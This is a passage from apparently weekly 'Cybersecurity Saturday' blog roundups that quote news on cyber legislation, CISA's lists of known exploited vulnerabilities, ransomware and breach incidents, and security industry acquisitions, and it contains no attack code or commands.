    • “In a post on its website, ConnectWise said it has notified all affected customers, alerted law enforcement to the attack and retained Mandiant to help with its investigation. 
    • “A company spokesperson added that ConnectWise issued a patch for ScreenConnect, implemented enhanced monitoring and hardening measures across its environment.” 
  • and
    • “More than 9,000 ASUS routers have been compromised in a months-long hacking campaign that researchers from GreyNoise warn may be a prelude to the creation of a botnet.
    • “Hackers are breaching routers through brute-force login attempts and authentication bypasses that rely on a command injection vulnerability, tracked as CVE-2023-39780, to execute system commands, GreyNoise researchers said in a blog post on Wednesday.
    • “GreyNoise first detected suspicious activity in March, when it flagged three suspicious HTTP POST requests made to ASUS routers, according to Matthew Remacle, senior researcher at GreyNoise.
    • “ASUS released a patch for the vulnerability in a recent firmware update, but the initial bypass attempts have not received CVEs, according to GreyNoise. In addition, researchers say, if a router was compromised before the firmware was updated, a backdoor will still remain on the devices unless secure shell protocol access is explicitly disabled.” 
  • Per Cyberscoop,
    • “As the internet fills up with clips from AI-video generators, hacking groups are seeding the online landscape with malware-laced programs and fake websites hoping to cash in on the trend.
    • “Tracked by researchers at Mandiant and Google Cloud, the campaign is being carried out by a group identified as “UNC6032.” Since mid-2024, they have spread thousands of advertisements, fake websites and social media posts promising victims access to popular prompt-to-video AI generation tools like Luma AI, Canva Dream Lab and Kling AI.
    • “Those promises lead to phishing pages and malware, with the group deploying infostealers and backdoors on victim devices. Compromised parties saw their login credentials, cookies, credit card data and in some cases Facebook information stolen, and the scheme appears to be impacting a wide range of industries and geographic areas.”
  • CISA did not add any known exploited vulnerabilities to its catalog this week.

From the ransomware front,

  • Dark Reading tells us,
    • “Extortionist-cum-information broker “Everest Group” has pulled off a swath of attacks against large organizations in the Middle East, Africa, Europe, and North America, and is now extorting victims over records stolen from their human resources departments.
    • “This May, the long-overlooked threat actor advertised nine new cyberattacks. Victims ranged from healthcare organizations to construction and facilities management companies. But its biggest win came against Coca-Cola, from which it stole records associated with hundreds of employees, including their personally identifying information (PII) like names and addresses, salary records, and scans of passports and visas.
    • “In each of these leaks, researchers from VenariX found files relating to SAP SuccessFactors, SAP’s cloud-based HR management platform. The researchers believe the attacks to be legitimate and estimate that initial access in each case likely occurred through a third-party SAP service provider called “INK IT Solutions.”
  • The Hacker News notes,
    • “The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider’s (MSP) SimpleHelp remote monitoring and management (RMM) tool and then leveraged it to exfiltrate data and drop the locker on multiple endpoints.
    • “It’s believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that were disclosed in January 2025 to access the MSP’s SimpleHelp deployment, according to an analysis from Sophos.
    • “The cybersecurity company said it was alerted to the incident following a suspicious installation of a SimpleHelp installer file, pushed via a legitimate SimpleHelp RMM instance that’s hosted and operated by the MSP for their customers.”
    • The threat actors have also been found to leverage their access through the MSP’s RMM instance to collect information from different customer environments about device names and configuration, users, and network connections.
  • Fortra tells us what we need to know about Interlock ransomware.
  • Per Bleeping Computer,
    • “Threat actors linked to lesser-known ransomware and malware projects now use AI tools as lures to infect unsuspecting victims with malicious payloads.
    • “This development follows a trend that has been growing since last year, starting with advanced threat actors using deepfake content generators to infect victims with malware.
    • “These lures have become widely adopted by info-stealer malware operators and ransomware operations attempting to breach corporate networks.
    • “Cisco Talos researchers have discovered that the same technique is now followed by smaller ransomware teams known as CyberLock, Lucky_Gh0$t, and a new malware named Numero.
    • “The malicious payloads are promoted via SEO poisoning and malvertising to rank them high in search engine results for specific terms.”
  • Per CFO Dive,
    • “About one in four companies targeted in a ransomware incident in the last year did not get all their data back after paying the attacker, cybersecurity firm Delinea said in a report released Wednesday.
    • “Delinea also found that most ransomware today includes data-theft extortion, with 85% of victims saying they were threatened with having their data published or sold.
    • “Paying the ransom doesn’t always bring the desired results,” Delinea said in the report.”

From the cybersecurity business and defenses front,

  • Dark Reading notes,
    • Tenable Security has announced plans to acquire Apex, an Israel-based startup specializing in security solutions driven by artificial intelligence (AI). Apex will be integrated into Tenable One, Tenable’s software-as-a-service-based exposure management platform.
    • “Founded in 2023, Apex helps organizations discover ungoverned AI. Co-founders Matan Derman (CEO) and Tomer Avni (chief product officer) developed a platform designed to surface all AI activities, including shadow apps, AI-generated code, and fake identities. The boutique company of roughly 20 employees competes with Prompt Security, Lasso Security, and Aim Security.”
  • Per Cyberscoop,
    • Zscaler announced Tuesday its intention to acquire Red Canary, a company known for Managed Detection and Response (MDR) services, to boost its ability to integrate artificial intelligence, automation and human expertise into its security offerings. 
    • “The acquisition is positioned around the convergence of Zscaler’s data-driven, AI-centric cloud security and Red Canary’s decade of operational expertise in MDR. Zscaler’s executive leadership emphasizes the blending of large-scale data intelligence and automated, agentic Security Operations Centers (SOCs) with the capabilities of ThreatLabz, its security research division.
    • “The proposed acquisition of Red Canary is a natural expansion of our capabilities into managed detection and response and threat intelligence to accelerate our vision of AI-powered SOC of the future,” Jay Chaudhry, CEO and founder of Zscaler, said in a press release. “By integrating Red Canary with Zscaler, we will deliver to our customers the power of a fully integrated Zero Trust platform and AI-powered security operations.”
  • Dark Reading lets us know,
    • “Chief information security officers (CISOs) are being paid better than ever, more likely to be an executive — or report directly to an executive — and have expanding responsibilities. Yet tight security budgets continue to be a major challenge.
    • “Overall, the top cybersecurity professional is doing well at large companies and has proven their value but continually has to work to link security to business opportunities rather than costs, according to two surveys published this week.
    • “The average CISO at large US companies — those with revenue of $1 billion or more — has a current compensation of $532,000, including base salary, bonuses, and equity benefits, according to survey data published by cybersecurity consultancy IANS Research on May 29. Increasing responsibilities come with the high salaries, with CISOs now often charged with assessing business risk, product security, and digital strategy.
  • Per Dark Reading explains why “A Defense-in-Depth Approach for the Modern Era By integrating intelligent network policies, zero-trust principles, and AI-driven insights, enterprises can create a robust defense against the next generation of cyber threats.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity policy and law enforcement front,

  • Cyberscoop tells us,
    • “A bipartisan Senate duo is reintroducing legislation Thursday that would establish an executive branch panel to align conflicting cybersecurity regulations on the private sector.
    • “Michigan Sen. Gary Peters, the top Democrat on the Homeland Security and Governmental Affairs Committee, is bringing back the Streamlining Federal Cybersecurity Regulations Act with co-sponsor James Lankford, R-Okla.
    • “By reducing the number of duplicative or burdensome reporting requirements, we can give businesses the tools to better secure our critical infrastructure against the serious threat of cyberattacks,” Peters said about the reintroduction of the bill, which CyberScoop is first reporting. “This legislation ensures federal agencies can work collaboratively to create effective cybersecurity standards, enabling businesses to focus on safeguarding their systems rather than navigating a maze of conflicting requirements.”
  • and
    • “A bipartisan pair of senators is taking another shot at legislation that would require federal government contractors to follow National Institute of Standards and Technology guidelines on vulnerability disclosure policies.
    • “The Federal Contractor Cybersecurity Vulnerability Reduction Act from Sens. Mark Warner, D-Va., and James Lankford, R-Okla., advanced out of the chamber’s Homeland Security and Governmental Affairs Committee last November but never got a full floor vote.
    • “The companion bill from Reps. Nancy Mace, R-S.C., and Shontel Brown, D-Ohio, meanwhile, was reintroduced in January and passed the House in March.
    • “The re-do from Warner and Lankford would make sure government contractors have the same legal obligations that federal agencies do in abiding by NIST’s recommendations on vulnerability disclosure policies. With VDPs, organizations can receive unsolicited reports on software vulnerabilities and patch them before an attack occurs.” 
  • Per a Cybersecurity and Infrastructure Security Agency news release,
    • The Cybersecurity and Infrastructure Security Agency (CISA) is proud to announce the appointment of Madhu Gottumukkala as its new Deputy Director. In this role, he will help lead CISA’s mission to understand, manage, and reduce risk to the cyber and physical infrastructure that the American people rely on every day. 
    • Prior to his appointment as the CISA Deputy Director, Dr. Gottumukkala served as Commissioner and Chief Information Officer for South Dakota’s Bureau of Information and Technology, overseeing statewide technology and cybersecurity initiatives. He assumed this role after serving as South Dakota’s second-ever chief technology officer, focused on innovation through the adoption of emerging technologies, while increasing efficiency by replacing outdated legacy systems.
    • “I am honored to be appointed by Secretary Noem to serve as Deputy Director of CISA. As a former state and local leader, I have seen firsthand the exceptional work CISA does in advancing our nation’s cybersecurity and infrastructure resilience,” said Gottumukkala. “I look forward to building on that foundation by fostering collaboration and strengthening resilience across all levels of government and the private sector. Together, through trusted partnerships, transparency, and shared responsibility, we can better manage systemic risks and safeguard the critical functions that ensure our nation’s safety and prosperity.”
  • Cybersecurity Dive reports,
    • “Microsoft’s Digital Crimes Unit (DCU) on Wednesday [May 21] announced an international operation to disrupt Lumma Stealer, a variant of infostealing malware that is popular with criminal gangs and other threat actors worldwide. 
    • “Hackers have used Lumma to steal passwords, credit cards, bank account information and cryptocurrency wallets in major attack campaigns in recent years, Steven Masada, assistant general counsel at Microsoft’s DCU, said in a blog post.
    • “Between March 16 and May 16, Microsoft identified more than 394,000 Windows computers infected with Lumma. After obtaining a court order from the U.S. District Court for the Northern District of Georgia, Microsoft seized 2,300 domains that formed the backbone of Lumma’s infrastructure. The U.S. Department of Justice also seized Lumma’s central command structure and disrupted online marketplaces that sold Lumma.”
  • Here is a link to a related CISA advisory.

From the cybersecurity vulnerabilities and breaches front,

  • CISA added seven known exploited vulnerabilities to its catalog this week.
    • May 19, 2025
      • CVE-2025-4427 Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability
      • CVE-2025-4428 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability
      • CVE-2024-11182 MDaemon Email Server Cross-Site Scripting (XSS) Vulnerability
      • CVE-2025-27920 Srimax Output Messenger Directory Traversal Vulnerability
      • CVE-2024-27443 Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
      • CVE-2023-38950 ZKTeco BioTime Path Traversal Vulnerability
        • Ivanti discusses its KVEs here.
        • Cyber Press discusses the MDaemon KVE here.
        • TechTarget discusses the Srimax KVE here.
        • Syscan discusses the Synacor KVE here.
    • May 22, 2025
      • CVE-2025-4632 Samsung MagicINFO 9 Server Path Traversal Vulnerability
        • The Hacker News discusses this KVE here.
  • On May 21, released a joint cybersecurity advisory which
    • highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue.
  • On May 22, CISA released an “Advisory Update on Cyber Threat Activity Targeting Commvault’s SaaS Cloud Application (Metallic).
  • Security Week relates “The developers of OpenPGP.js have released updates to patch a critical vulnerability that can be exploited to spoof message signature verification.”
    • OpenPGP.js is an open-source JavaScript implementation of the OpenPGP email encryption library, enabling its use on any device. According to its developers, “The idea is to implement all the needed OpenPGP functionality in a JavaScript library that can be reused in other projects that provide browser extensions or server applications.”
    • “Its website shows that OpenPGP.js is used by projects such as FlowCrypt, Mymail-Crypt, UDC, Encrypt.to, PGP Anywhere, and Passbolt.”
  • Dark Reading points out “3 Severe Bugs Patched in Versa’s Concerto Orchestrator. Three zero-days could have allowed an attacker to completely compromise the Concerto application and the host system running it.”
  • Per SC Media,
    • “Stolen credentials were the root cause of more than 30% of data breaches last year, according to Verizon’s 2025 Data Breach Investigations Report. Attackers compromised more than 23 million unmanaged and user-controlled devices—including personal laptops and home systems used in remote work settings—to extract login information, often using session cookies to bypass multi-factor authentication and other access controls.
    • “Credentials don’t just manifest—you’re either phishing them, brute forcing them, or stealing them via malware,” said Philippe Langlois, lead data scientist at Verizon and co-author of the 2025 DBIR, speaking at last month’s RSAC 2025.
    • “Those numbers aren’t outliers—they’re symptoms of a deeper failure in enterprise cybersecurity. Identity systems, Langlois noted at RSAC 2025, are now routinely exploited as entry points with attackers relying less on technical exploits—like finding and exploiting software vulnerabilities—and more on credential-based access, where they simply log in using stolen usernames, passwords, or hijacked sessions.”

From the ransomware front,

  • Cybersecurity Dive lets us know,
    • “Kettering Health is facing a cyberattack that’s impacting patient care, the Ohio-based health system said on Tuesday [May 20].
    • “The provider was hit by a system-wide technology outage Tuesday morning due to unauthorized access to its network, Kettering said in a press release. 
    • “Elective inpatient and outpatient procedures at the health system’s facilities were canceled Tuesday. Kettering’s call center was also knocked offline and might have been occasionally inaccessible, the provider added.”
  • Security Week informs us,
    • “In a data breach notice published on its website, Marlboro-Chesterfield Pathology said it discovered unauthorized activity on some internal IT systems on January 16, 2025. An investigation revealed that the hackers had stolen some files.
    • “The compromised data includes personal information such as name, address, date of birth, medical treatment information, and health insurance information. The stolen information varies by individual. 
    • “MCP informed the US Department of Health and Human Services (HHS) this week that the incident impacted 235,911 individuals.”
  • Per Bleeping Computer,
    • “The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks.
    • “Also known as Luna Moth, Chatty Spider, and UNC3753, this threat group has been active since 2022and was also behind BazarCall campaigns that provided initial access to corporate networks for Ryuk and Conti ransomware attacks.
    • “In March 2022, following Conti’s shutdown, the threat actors separated from the cybercrime syndicate and formed their own operation called Silent Ransom Group (SRG).
    • “In recent attacks, SRG impersonates the targets’ IT support in email, fake sites, and phone calls using social engineering tactics to gain access to the targets’ networks.
    • “This extortion group doesn’t encrypt the victims’ systems and is known for demanding ransoms not to leak sensitive information stolen from compromised devices online.”
  • Per Dark Reading,
    • “Yet another threat group has embraced the trend of combining email bombing with vishing to gain initial access to systems and deploy ransomware.
    • “This time the adversary employing the technique, first documented as a tactic of Black Basta ransomware group, is the recently emerged 3AM ransomware group, researchers at Sophos revealed in a recent blog post. Sophos spotted an attack in the first quarter this year by 3AM affiliates, which followed the familiar playbook and successfully stole data from the targeted system but did not complete the ransomware attack.”
  • Per Fortra’s Tripline,
    • “Health-ISAC recently released their 2025 Health Sector Cyber Threat Landscape Report, a comprehensive outline of the malicious activity aimed at healthcare in the previous year. Not surprisingly, ransomware was cited by security professionals in the industry as the number one threat of 2024 and the top area of concern coming into 2025 (followed by third-party breaches, supply chain attacks, and zero-day exploits). Some things never change.
    • “However, when it comes to ransomware, they do evolve. Take a look at [the Tripline article] some of the reasons ransomware maintains its top spot as the primary plague of healthcare organizations as we move into another threat-filled year.”

From the cybersecurity business and defenses front,

  • Cybersecurity Dive reports,
    • “Shares of Palo Alto Networks fell Wednesday after the company reported better-than-expected earnings in the third fiscal quarter but disappointed some investors over its margins. 
    • “The company reported non-GAAP (generally accepted accounting principles) net income of 80 cents a share during the quarter that ended on April 30, up from 66 cents in the same quarter last year. Those earnings beat consensus estimates of 77 cents. 
    • “Revenue grew 15%, to $2.3 billion, in the quarter, compared with $2 billion in the same period last year.”
  • and
    • Companies designing AI systems should protect training data from tampering and strictly limit access to its underlying infrastructure, the U.S. and three allies said in a joint guidance document published on Thursday [May 22].
    • The AI security guidance addresses multiple topics, including protecting data throughout the AI systems’ life cycle, supply chain considerations and ways to mitigate possible attacks on large data sets.
    • The multilateral warning reflects concerns in the U.S. and allied nations about powerful AI models containing vulnerabilities that can ripple across critical infrastructure.
  • NIST discusses “Cybersecurity and AI: Integrating and Building on Existing NIST Guidelines.”
  • The Wall Street Journal explains “How to lock down your finances and online accounts after a data breach spreads your information to the secret corners of the internet.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • Congress moved one step closer to reauthorizing a key cyber threat information-sharing law on Thursday during a hearing that highlighted both the act’s value and potential shortcomings.
    • The House Homeland Security Committee’s cyber subcommittee held the hearing [on May 15] to evaluate the private sector’s satisfaction with the 2015 Cybersecurity Information Sharing Act, which expires on Sept. 30. Witnesses from the tech industry praised the law for encouraging companies to share cyber threat indicators with each other and with federal agencies, but they also offered lawmakers suggestions for how to improve the program.”
  • Defensescoop tells us,
    • “The Department of Defense has expanded its number of cyber teams by 12, with two more slated to come online in the next few years, according to a spokesperson.
    • “The cyber mission force began building in 2012, and the initial 133 teams reached full operational capability in 2018. In DOD’s fiscal 2022 budget request, U.S. Cyber Command proposed and was eventually approved for a phased approach to add 14 additional cyber mission force teams beyond the original 133. That request and authorization in 2021 was the first substantial effort to grow that force since it was designed almost a decade ago, long before modern and advanced threats had surfaced.
    • “In 2021, the Secretary of Defense directed the creation of 14 New cyber teams by September 2028. Of the 14 teams, 12 have been established. These teams are spread across Army, Air Force, and Navy Commands,” a Cybercom spokesperson said.
    • “They declined to offer specifics regarding how many additional teams each service received or what types of teams those additional builds provided to each service — such as offensive, defensive or support teams — citing operational security.”
  • Per a May 15 HHS press release,
    • “Today, the U.S. Department of Health and Human Services (HHS), Office for Civil Rights (OCR) announced a settlement with Vision Upright MRI, a small California health care provider that conducts magnetic resonance imaging and related services, concerning potential violations of the Health Insurance Portability and Accountability Act of 1996 (HIPAA) Breach Notification and Security Rules. The settlement resolves an OCR investigation concerning the breach of an unsecured server containing the medical images of 21,778 individuals.” * * *
    • “Under the terms of the resolution agreement, Vision Upright MRI agreed to implement a corrective action plan that will be monitored by OCR for two years and paid $5,000 to OCR.” 
    • “The resolution agreement and corrective action plan may be found at: https://www.hhs.gov/hipaa/for-professionals/compliance-enforcement/agreements/hhs-ocr-hipaa-racap-vum/index.html
  • Cyberscoop informs us,
    • “Federal authorities seized two domains and indicted four foreign individuals for alleged involvement in a long-running botnet service that infected older wireless internet routers, the Justice Department said Friday. 
    • “The malware created for the botnet allowed infected routers to be reconfigured, which granted unauthorized access to third parties and made the routers available for sale as proxy servers on Anyproxy.net and 5socks.net, according to law enforcement officials. Both domains, which were managed by a company headquartered in Virginia and hosted on servers worldwide, now render seizure notices under an effort the DOJ and FBI dubbed “Operation Moonlander.”
    • “The 5socks.net website claimed to be in operation for over 20 years and had more than 7,000 proxies for sale worldwide for a monthly subscription of $9.95 to $110 per month, according to prosecutors. The botnet’s overseas operations were also seized and disabled by law enforcement agencies in the Netherlands and Thailand.
    • “Authorities also indicted the botnet’s alleged administrators and charged them with conspiracy and damage to protected computers, for conspiring with others to maintain, operate and profit from the bot.”
  • and
    • Liridon Masurica, the alleged lead administrator of cybercrime marketplace BlackDB.cc, was extradited to the United States on Friday and faces charges that carry a maximum penalty of 55 years in federal prison, the Justice Department said Tuesday. 
    • Masurica, 33, who is also known as “@blackdb,” was arrested by authorities in Kosovo on Dec. 12. He made his initial appearance in federal court in Tampa, Fla., on Tuesday and was ordered detained pending a trial. 
    • Federal prosecutors charged Masurica with one count of conspiracy to commit access device fraud and five counts of fraudulent use of 15 or more unauthorized access devices.
    • Masurica, of Gjilan, Kosovo, is accused of running BlackDB.cc since 2018. The cybercriminal marketplace offered to sell compromised account and server credentials, credit card information and other personally identifiable information of individuals mostly located in the United States, the DOJ said.

From the cybersecurity breaches and vulnerabilities front,

  • Cyberscoop reports,
    • “Hundreds of victims are surfacing across the world from zero-day cyberattacks on Europe’s biggest software manufacturer and company, in a campaign that one leading cyber expert is comparing to the vast Chinese government-linked Salt Typhoon and Volt Typhoon breaches of critical infrastructure.
    • “The zero-days — vulnerabilities previously unknown to researchers or companies, but that malicious hackers have discovered — got patches this month and last month, but there are signs it could be getting worse before it gets better, according to Dave DeWalt, CEO of NightDragon, a venture capital and advisory firm. Ransomware gangs are now reported to be exploiting it, beyond the original Chinese government-connected attackers.
    • “The net of it is this is like the Typhoon size, so much like we saw [with] Volt Typhoonand then Salt Typhoon,” DeWalt told CyberScoop. “Once these exploits get into the wild, it’s a race to see who can get more access to it. So initially it looks like three Chinese actors all used it, and now we’re going to see more.”
    • “A number of companies have been tracking the vulnerability and its consequences, including one, Onapsis, that DeWalt’s company invests in, along with EclecticIQReliaQuest and Google’s Mandiant.”
  • and
    • “Over the past few years, cybersecurity experts have increasingly said that nation-state operatives and cybercriminals often blur the boundaries between geopolitical and financial motivations. A new report released Wednesday shows how North Korea has flipped that idea on its head. 
    • “North Korea has silently forged a global cyber operation that experts now liken to a mafia syndicate, with tactics and organization far removed from other nation-state actors, according to a comprehensive new report released by DTEX Systems.
    • “The study — based on years of investigations, technical analysis, and work with other open-source intelligence analysts — pulls back the curtain on a highly adaptive regime that has built its cyber capabilities on a survivalist, profit-driven approach. It reveals a hierarchy blending criminality, espionage, and front-line IT work, coordinated by an authoritarian government that rewards loyalty and secrecy while punishing failure.” * * *
    • “You can read the full report on DTEX’s website.”
  • Cybersecurity Dive relates.
    • “The FBI is warning about a threat campaign in which malicious actors are impersonating senior U.S. officials using malicious text messages and AI-generated voice messages.
    • “The messages have been sent to current and former federal and state officials and others who may be contacts of those individuals, the bureau said in an alert released Thursday.
    • “The messages are designed to establish a rapport with individuals who might then turn over access to a personal account, according to the alert. These social engineering techniques could be used to reach additional contacts and gain access to additional information or funds.”
  • Bleeping Computer lets us know,
    • “A new tool called ‘Defendnot’ can disable Microsoft Defender on Windows devices by registering a fake antivirus product, even when no real AV is installed.
    • “The trick utilizes an undocumented Windows Security Center (WSC) API that antivirus software uses to tell Windows it is installed and is now managing the real-time protection for the device.
    • “When an antivirus program is registered, Windows automatically disables Microsoft Defender to avoid conflicts from running multiple security applications on the same device.
    • “The Defendnot tool, created by researcher es3n1n, abuses this API by registering a fake antivirus product that meets all of Windows’ validation checks. * * *
    • “While Defendnot is considered a research project, the tool demonstrates how trusted system features can be manipulated to turn off security features.
    • “Microsoft Defender is currently detecting and quarantining Defendnot as a ‘Win32/Sabsik.FL.!ml; detection.”
  • The Cybersecurity and Infrastructure Security Agency (CISA) added nine known exploited vulnerabilities to its catalog this week.
  • May 13, 2025
    • CVE-2025-30400 Microsoft Windows DWM Core Library Use-After-Free Vulnerability
    • CVE-2025-32701 Microsoft Windows Common Log File System (CLFS) Driver Use-After-Free Vulnerability
    • CVE-2025-32706 Microsoft Windows Common Log File System (CLFS) Driver Heap-Based Buffer Overflow Vulnerability
    • CVE-2025-30397 Microsoft Windows Scripting Engine Type Confusion Vulnerability
    • CVE-2025-32709 Microsoft Windows Ancillary Function Driver for WinSock Use-After-Free Vulnerability”
      • Crowdstrike discusses these KVEs here.
      • Cyberscoop discusses Microsoft’s May 13 Patch Tuesday here.
      • See also Bleeping Computer article titled “Microsoft confirms May Windows 10 updates trigger BitLocker recovery”
  • May 14, 2025
    • CVE-2025-32756 Fortinet Multiple Products Stack-Based Buffer Overflow Vulnerability”
      • Rapid 7 discusses this KVE here.
  • May 15, 2025
    • CVE-2024-12987 DrayTek Vigor Routers OS Command Injection Vulnerability
      • This KVE is discussed here.
    • CVE-2025-4664 Google Chromium Loader Insufficient Policy Enforcement Vulnerability
      • This KVE is discussed here.
    • CVE-2025-42999 SAP NetWeaver Deserialization Vulnerability”
      • The KVE is discussed here.
  • Cyberscoop adds,
    • “Apple rolled out a series of substantial security updates Monday for its major software platforms, with advisories covering iOS, iPadOS, and two versions of macOS lines, addressing more than 30 vulnerabilities in total. 
    • “Among the numerous fixes, iOS 18.5 and iPadOS 18.5 introduce the first security update for Apple’s in-house C1 modem, featured in the newly released iPhone 16e. The patch addresses a baseband vulnerability (CVE-2025-31214) that, according to the company, could have allowed an attacker “in a privileged network position” to intercept network traffic. While the specific details remain undisclosed, the risk highlights concerns about how devices communicate on the hardware level, since baseband processors control things like data transmission, call processing, and other network functions.”
  • PC World reports
    • “Malware is a thing you just have to be aware of. But it’s pretty rare that it can actually damage your computer in a permanent sense — wipe the drive if you’re okay with losing local data, and you can generally get up and running in a day or two. But what if the microcode running on your CPU’s tiny integrated memory becomes infected? One security researcher says he’s done it.
    • “Christiaan Beek of Rapid7 says he has created a proof-of-concept ransomware that can hide inside a CPU’s microcode, building on previous work that emerged when Google required AMD processors to always return “4” when asked for a random number. He claims that modifying UEFI firmware can install an unsigned update to the processor, slipping past any kind of conventional antivirus or OS-based security.” * * *
    • “CPU-level ransomware has not been seen “in the wild,” and it seems likely that when and if it emerges, it’ll be a state-level actor that exploits it first. That means your typical user probably won’t be targeted, at least immediately. Still, maybe keep a remote backup of your important files, just in case.”

From the ransomware front,

  • Per a news release,
    • Black Kite, the leader in third-party cyber risk intelligence, today announced its newest report, 2025 Ransomware Report: How Ransomware Wars Threaten Third-Party Cyber Ecosystems, which provides a deep analysis into evolving ransomware trends and threats. The report found that threats have escalated with more actors, less predictability, and deeper entanglement in supply chains, underscoring an urgent need for organizations to implement intelligence-driven defenses and proactive vendor monitoring.”
  • Beckers Hospital Review tells us,
    • “From October 2009 to October 2024, ransomware and hacking have increasingly driven healthcare data breaches, a May 14 study published in JAMA Network Open found. 
    • “The study examined ransomware attacks and other hacking incidents across all healthcare organizations covered by HIPAA from October 2009 through October 2024. It analyzed breaches affecting 500 or more patient records that were reported to the U.S. Department of Health and Human Services (HHS) Office for Civil Rights.”
  • Cybersecurity Dive reports,
    • “A cybercrime gang believed to be responsible for three attacks in the U.K. in recent weeks has turned its attention toward the U.S. and has been able to compromise multiple targets in the sector, according to researchers from Google Threat Intelligence Group and Google subsidiary Mandiant. 
    • “Researchers said the same threat actors linked to attacks against U.K. companies are now using well-crafted social engineering techniques against U.S. retail companies.  
    • “The threat group, tracked as UNC3944 or Scattered Spider, is widely considered the prime suspect in the attacks on British firms Harrods, Co-op and M&S, but Mandiant and Google have not formally attributed the intrusions to any specific actor. Researchers said, however, that the hackers behind the U.S. attacks share the same techniques and procedures as the intruders in the British incidents.”
  • Dark Reading adds,
    • “While dynamic DNS services have been around for many years, they’ve recently emerged as an integral tool in the arsenals of cybercriminal groups like Scattered Spider.
    • “Dynamic DNS (DDNS) services automatically update a domain name’s DNS records in real-time when the Internet service provider changes the IP address. Real-time updating for DNS records wasn’t needed in the early days of the Internet when static IP addresses were the norm.” * * *
    • “In a blog post last month, threat intelligence vendor Silent Push reported that despite some notable arrests of alleged members in 2024, Scattered Spider was actively engaged in new phishing campaigns targeting well-known enterprises. One of the key findings of the report was a shift in tactics from Scattered Spider members that featured the use of rentable subdomains from dynamic DNS providers like it.com Domains LLC.
    • “In an example of an observed attack, Scattered Spider actors established a new subdomain, klv1.it[.]com, designed to impersonate a similar domain, klv1.io, for Klaviyo, a Boston-based marketing automation company.
    • “Silent Push’s report noted that the malicious domain had just five detections on VirusTotal at the time of publication. The company also said the use of publicly rentable subdomains presents challenges for security researchers.”
  • Bleeping Computer points out,
    • “Ransomware gang members increasingly use a new malware called Skitnet (“Bossnet”) to perform stealthy post-exploitation activities on breached networks.
    • “The malware has been offered for sale on underground forums like RAMP since April 2024, but according to Prodaft researchers, it started gaining significant traction among ransomware gangs since early 2025.
    • ‘Prodaft told BleepingComputer they have observed multiple ransomware operations deploying Skitnet in real-world attacks, including BlackBasta in Microsoft Teams phishing attacks against the enterprise, and Cactus.”

From the cybersecurity business and defenses front,

  • Cyberscoop reports,
    • Proofpoint has entered into an agreement to acquire Hornetsecurity Group, a Germany-based provider of Microsoft 365 security services, in a deal reportedly valued at more than $1 billion.
    • “The acquisition, described as the largest in Proofpoint’s history, comes amid accelerating consolidation in the cybersecurity industry as companies seek to broaden their offerings to enterprise customers of all sizes. While Proofpoint did not disclose terms, CNBC reports the deal is “well over” $1 billion. 
    • “Hornetsecurity, headquartered in Hannover, Germany, serves more than 12,000 managed service providers (MSPs) and 125,000 small and mid-sized businesses (SMBs) primarily across Europe. According to a press release announcing the deal, Hornetsecurity brings in $160 million in annual recurring revenue, with growth exceeding 20% year over year. 
    • “For Proofpoint, the acquisition provides an entry point into the SMB market through Hornetsecurity’s established MSP network.'” * * *
    • “The transaction comes as Proofpoint, which was taken private by Thoma Bravo in 2021for $12.3 billion, is exploring an IPO, according to the CNBC report.” 
  • and
    • “Coinbase responded to a security incident with combative measures Thursday after the company said cybercriminals bribed some of the cryptocurrency exchange’s international support staff to steal data on customers. The unnamed threat group stole personally identifiable information and other sensitive data on less than 1% of Coinbase’s monthly users, the company said in a blog post.
    • “The cybercriminals contacted customers under the guise of an employee at Coinbase in an attempt to dupe people into relinquishing their cryptocurrency. “They then tried to extort Coinbase for $20 million to cover this up. We said no,” the company said.
    • Coinbase flipped the script as part of its response. “Instead of paying this $20 million ransom, we’re turning it around and we’re putting out a $20 million award for any information leading to the arrest and conviction of these attackers,” Coinbase CEO Brian Armstrong said in a video posted on X.
    • “For these would-be extortionists, or anyone seeking to harm Coinbase customers, know that we will prosecute you and bring you to justice,” he added.” 
  • Dark Reading shares insights on the recent RSAC conference and of course also offers its CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity

From the cybersecurity policy and law enforcement front,

  • Per a Senate news release,
    • “U.S. Senators Mike Rounds (R-S.D.), Chairman of the Senate Armed Services Committee’s Subcommittee on Cybersecurity, and Gary Peters (D-Mich.) introduced a bipartisan bill to extend the Cybersecurity Information Sharing Act (CISA) of 2015 for an additional ten years.
    • CISA, signed into law in 2015, incentivizes companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). This protects Americans’ personal information and makes certain that both the federal government and companies can take collaborative steps to prevent data breaches or attacks from cybercriminals and foreign adversaries.
    • “The Cybersecurity Information Sharing Act of 2015 has been instrumental in strengthening our nation’s cyber defenses by enabling critical information sharing between the private sector and government,” said Rounds. “Allowing this legislation to lapse would significantly weaken our cybersecurity ecosystem, removing vital liability protections and hampering defensive operations across both the defense industrial base and critical infrastructure sectors.”
    • “As cybersecurity threats grow increasingly sophisticated, information sharing is not just valuable—it remains essential for our national security,” said Peters. “For the past ten years, these critical protections have helped to address rapidly evolving cybersecurity threats, and this bipartisan bill will renew them so we can continue this collaborative partnership between the private sector and government to bolster our nation’s cybersecurity defenses against a wide range of adversaries.”
    • Click HERE to read full text of the bill.
  • Cyberscoop reports,
